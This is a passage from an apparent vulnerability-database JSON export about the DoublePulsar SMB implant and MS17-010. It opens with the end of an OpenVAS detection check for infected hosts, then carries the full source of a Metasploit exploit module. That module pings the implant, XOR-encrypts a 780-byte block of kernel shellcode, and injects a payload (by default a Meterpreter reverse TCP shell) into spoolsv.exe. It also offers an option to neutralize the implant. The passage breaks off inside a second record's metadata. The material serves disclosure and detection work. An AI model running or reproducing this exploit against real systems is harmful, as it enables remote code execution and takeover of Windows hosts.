0x00 );\n\nsend( socket:soc, data: smbtrans2_request);\n\n##Trans2 Response, SESSION_SETUP, Error: STATUS_NOT_IMPLEMENTED\nsmb_trans2_resp = smb_recv( socket:soc );\nif(strlen(smb_trans2_resp) < 34)\n{\n close( soc );\n exit( 0 );\n}\n\n##The intent of this request is to check if the system is already compromised.\n##Infected or not, the system will respond with a \"Not Implemented\" message.\nif(smb_trans2_resp && (ord(smb_trans2_resp[9])==2 && ord(smb_trans2_resp[10])==0\n && ord(smb_trans2_resp[11])==0 && ord(smb_trans2_resp[12])==192))\n{\n ##As part of the message, a \"Multiplex ID\" is returned.\n ##For normal systems it is 65 (0x41) and for infected systems it is 81 (0x51).\n if(ord(smb_trans2_resp[34]) == 81)\n {\n security_message(port:smbPort );\n close(soc);\n exit(0);\n }\n}\nclose(soc);\n", "naslFamily": "Windows : Microsoft Bulletins", "_object_type": "robots.models.openvas.OpenVASBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.openvas.OpenVASBulletin"], "immutableFields": [], "cvss2": {}, "cvss3": {}}], "packetstorm": [{"id": "PACKETSTORM:154690", "hash": "fc8b72378cefabde943e1894796310be", "type": "packetstorm", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR Payload Execution / Neutralization", "description": "", "published": "2019-10-01T00:00:00", "modified": "2019-10-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "reporter": "Luke Jennings", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "lastseen": "2019-10-02T22:58:30", "history": [], "viewCount": 161, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:156196"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96705", "SMNTC-96704", "SMNTC-96706", "SMNTC-96709", "SMNTC-96707", "SMNTC-96703"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0203", "CPAI-2017-0419", "CPAI-2017-0177", "CPAI-2017-0200", "CPAI-2017-0205", "CPAI-2017-0198"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0143", "MS:CVE-2017-0148"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2019-10-02T22:58:30", "rev": 2}, "score": {"value": 8.1, "vector": "NONE", "modified": "2019-10-02T22:58:30", "rev": 2}}, "objectVersion": "1.5", "sourceHref": "https://packetstormsecurity.com/files/download/154690/doublepulsar_rce.rb.txt", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = GreatRanking \n \ninclude Msf::Exploit::Remote::SMB::Client \n \nMAX_SHELLCODE_SIZE = 4096 \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization', \n'Description' => %q{ \nThis module executes a Metasploit payload against the Equation Group's \nDOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. \n \nWhile this module primarily performs code execution against the implant, \nthe \"Neutralize implant\" target allows you to disable the implant. \n}, \n'Author' => [ \n'Equation Group', # DOUBLEPULSAR implant \n'Shadow Brokers', # Equation Group dump \n'zerosum0x0', # DOPU analysis and detection \n'Luke Jennings', # DOPU analysis and detection \n'wvu', # Metasploit module and arch detection \n'Jacob Robles' # Metasploit module and RCE help \n], \n'References' => [ \n['MSB', 'MS17-010'], \n['CVE', '2017-0143'], \n['CVE', '2017-0144'], \n['CVE', '2017-0145'], \n['CVE', '2017-0146'], \n['CVE', '2017-0147'], \n['CVE', '2017-0148'], \n['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'], \n['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'], \n['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'], \n['URL', 'https://github.com/countercept/doublepulsar-detection-script'], \n['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'], \n['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1'] \n], \n'DisclosureDate' => '2017-04-14', \n'License' => MSF_LICENSE, \n'Platform' => 'win', \n'Arch' => ARCH_X64, \n'Privileged' => true, \n'Payload' => { \n'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size, \n'DisableNops' => true \n}, \n'Targets' => [ \n['Execute payload', {}], \n['Neutralize implant', {}] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'EXITFUNC' => 'thread', \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' \n}, \n'Notes' => { \n'AKA' => ['DOUBLEPULSAR'], \n'RelatedModules' => [ \n'auxiliary/scanner/smb/smb_ms17_010', \n'exploit/windows/smb/ms17_010_eternalblue' \n], \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION] \n} \n)) \n \nregister_advanced_options([ \nOptBool.new('DefangedMode', [true, 'Run in defanged mode', true]), \nOptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe']) \n]) \nend \n \nOPCODES = { \nping: 0x23, \nexec: 0xc8, \nkill: 0x77 \n} \n \nSTATUS_CODES = { \nnot_detected: 0x00, \nsuccess: 0x10, \ninvalid_params: 0x20, \nalloc_failure: 0x30 \n} \n \ndef calculate_doublepulsar_status(m1, m2) \nSTATUS_CODES.key(m2.to_i - m1.to_i) \nend \n \n# algorithm to calculate the XOR Key for DoublePulsar knocks \ndef calculate_doublepulsar_xor_key(s) \nx = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8))) \nx & 0xffffffff # this line was added just to truncate to 32 bits \nend \n \n# The arch is adjacent to the XOR key in the SMB signature \ndef calculate_doublepulsar_arch(s) \ns == 0 ? ARCH_X86 : ARCH_X64 \nend \n \ndef generate_doublepulsar_timeout(op) \nk = SecureRandom.random_bytes(4).unpack('V').first \n0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00 \nend \n \ndef generate_doublepulsar_param(op, body) \ncase OPCODES.key(op) \nwhen :ping, :kill \n\"\\x00\" * 12 \nwhen :exec \nRex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*')) \nend \nend \n \ndef check \nipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\" \n \n@tree_id = do_smb_setup_tree(ipc_share) \nvprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\") \nvprint_status(\"Target OS is #{smb_peer_os}\") \n \nvprint_status('Sending ping to DOUBLEPULSAR') \ncode, signature1, signature2 = do_smb_doublepulsar_pkt \nmsg = 'Host is likely INFECTED with DoublePulsar!' \n \ncase calculate_doublepulsar_status(@multiplex_id, code) \nwhen :success \n@xor_key = calculate_doublepulsar_xor_key(signature1) \n@arch = calculate_doublepulsar_arch(signature2) \n \narch_str = \ncase @arch \nwhen ARCH_X86 \n'x86 (32-bit)' \nwhen ARCH_X64 \n'x64 (64-bit)' \nend \n \nvprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\") \nCheckCode::Vulnerable \nwhen :not_detected \nvprint_error('DOUBLEPULSAR not detected or disabled') \nCheckCode::Safe \nelse \nvprint_error('An unknown error occurred') \nCheckCode::Unknown \nend \nend \n \ndef exploit \nif datastore['DefangedMode'] \nwarning = <<~EOF \n \n \nAre you SURE you want to execute code against a nation-state implant? \nYou MAY contaminate forensic evidence if there is an investigation. \n \nDisable the DefangedMode option if you have authorization to proceed. \nEOF \n \nfail_with(Failure::BadConfig, warning) \nend \n \n# No ForceExploit because @tree_id and @xor_key are required \nunless check == CheckCode::Vulnerable \nfail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR') \nend \n \ncase target.name \nwhen 'Execute payload' \nunless @xor_key \nfail_with(Failure::NotFound, 'XOR key not found') \nend \n \nif @arch == ARCH_X86 \nfail_with(Failure::NoTarget, 'x86 is not a supported target') \nend \n \nprint_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\") \nshellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName']) \nshellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length) \nvprint_status(\"Total shellcode length: #{shellcode.length} bytes\") \n \nprint_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\") \nxor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode) \n \nprint_status('Sending shellcode to DOUBLEPULSAR') \ncode, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode) \nwhen 'Neutralize implant' \nreturn neutralize_implant \nend \n \ncase calculate_doublepulsar_status(@multiplex_id, code) \nwhen :success \nprint_good('Payload execution successful') \nwhen :invalid_params \nfail_with(Failure::BadConfig, 'Invalid parameters were specified') \nwhen :alloc_failure \nfail_with(Failure::PayloadFailed, 'An allocation failure occurred') \nelse \nfail_with(Failure::Unknown, 'An unknown error occurred') \nend \nensure \ndisconnect \nend \n \ndef neutralize_implant \nprint_status('Neutralizing DOUBLEPULSAR') \ncode, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill]) \n \ncase calculate_doublepulsar_status(@multiplex_id, code) \nwhen :success \nprint_good('Implant neutralization successful') \nelse \nfail_with(Failure::Unknown, 'An unknown error occurred') \nend \nend \n \ndef do_smb_setup_tree(ipc_share) \nconnect \n \n# logon as user \\ \nsimple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain']) \n \n# connect to IPC$ \nsimple.connect(ipc_share) \n \n# return tree \nsimple.shares[ipc_share] \nend \n \ndef do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil) \n# make doublepulsar knock \npkt = make_smb_trans2_doublepulsar(opcode, body) \n \nsock.put(pkt) \nbytes = sock.get_once \n \nreturn unless bytes \n \n# convert packet to response struct \npkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct \npkt.from_s(bytes[4..-1]) \n \nreturn pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2'] \nend \n \ndef make_smb_trans2_doublepulsar(opcode, body) \nsetup_count = 1 \nsetup_data = [0x000e].pack('v') \n \nparam = generate_doublepulsar_param(opcode, body) \ndata = param + body.to_s \n \npkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct \nsimple.client.smb_defaults(pkt['Payload']['SMB']) \n \nbase_offset = pkt.to_s.length + (setup_count * 2) - 4 \nparam_offset = base_offset \ndata_offset = param_offset + param.length \n \npkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2 \npkt['Payload']['SMB'].v['Flags1'] = 0x18 \npkt['Payload']['SMB'].v['Flags2'] = 0xc007 \n \n@multiplex_id = rand(0xffff) \n \npkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count \npkt['Payload']['SMB'].v['TreeID'] = @tree_id \npkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id \n \npkt['Payload'].v['ParamCountTotal'] = param.length \npkt['Payload'].v['DataCountTotal'] = body.to_s.length \npkt['Payload'].v['ParamCountMax'] = 1 \npkt['Payload'].v['DataCountMax'] = 0 \npkt['Payload'].v['ParamCount'] = param.length \npkt['Payload'].v['ParamOffset'] = param_offset \npkt['Payload'].v['DataCount'] = body.to_s.length \npkt['Payload'].v['DataOffset'] = data_offset \npkt['Payload'].v['SetupCount'] = setup_count \npkt['Payload'].v['SetupData'] = setup_data \npkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode) \npkt['Payload'].v['Payload'] = data \n \npkt.to_s \nend \n \n# ring3 = user mode encoded payload \n# proc_name = process to inject APC into \ndef make_kernel_user_payload(ring3, proc_name) \nsc = make_kernel_shellcode(proc_name) \n \nsc << [ring3.length].pack(\"S<\") \nsc << ring3 \n \nsc \nend \n \ndef generate_process_hash(process) \n# x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm \nproc_hash = 0 \nprocess << \"\\x00\" \n \nprocess.each_byte do |c| \nproc_hash = ror(proc_hash, 13) \nproc_hash += c \nend \n \n[proc_hash].pack('l<') \nend \n \ndef ror(dword, bits) \n(dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF \nend \n \ndef make_kernel_shellcode(proc_name) \n# see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm \n# Length: 780 bytes \n\"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" + \n\"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" + \n\"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" + \n\"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" + \n\"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" + \n\"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" + \n\"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" + \n\"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" + \n\"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" + \n\"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" + \n\"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" + \n\"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" + \n\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" + \ngenerate_process_hash(proc_name.upcase) + \n\"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" + \n\"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" + \n\"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" + \n\"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" + \n\"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" + \n\"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" + \n\"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" + \n\"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" + \n\"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" + \n\"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" + \n\"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" + \n\"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" + \n\"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" + \n\"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" + \n\"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" + \n\"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" + \n\"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" + \n\"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" + \n\"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" + \n\"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" + \n\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" + \n\"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" + \n\"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" + \n\"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" + \n\"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" + \n\"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" + \n\"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" + \n\"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" + \n\"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" + \n\"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" + \n\"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" + \n\"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" + \n\"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" + \n\"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" + \n\"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" + \n\"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\" \nend \n \ndef kernel_shellcode_size \nmake_kernel_shellcode('').length \nend \n \nend \n`\n", "_object_type": "robots.models.packetstorm.PacketstormBulletin", "_object_types": ["robots.models.packetstorm.PacketstormBulletin", "robots.models.base.Bulletin"], "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"id": "PACKETSTORM:156196", "hash": "c7d1e84efcb5229ac3bbe4b9c2098b31", "type": "packetstorm", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution", "description": "", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "reporter": "Luke Jennings", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "lastseen": "2020-02-06T14:50:28", "history": [], "viewCount": 140, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705", "SMNTC-96709"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0205", "CPAI-2017-0203", "CPAI-2017-0177", "CPAI-2017-0419", "CPAI-2017-0200", "CPAI-2017-0198"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "mmpc", "idList": 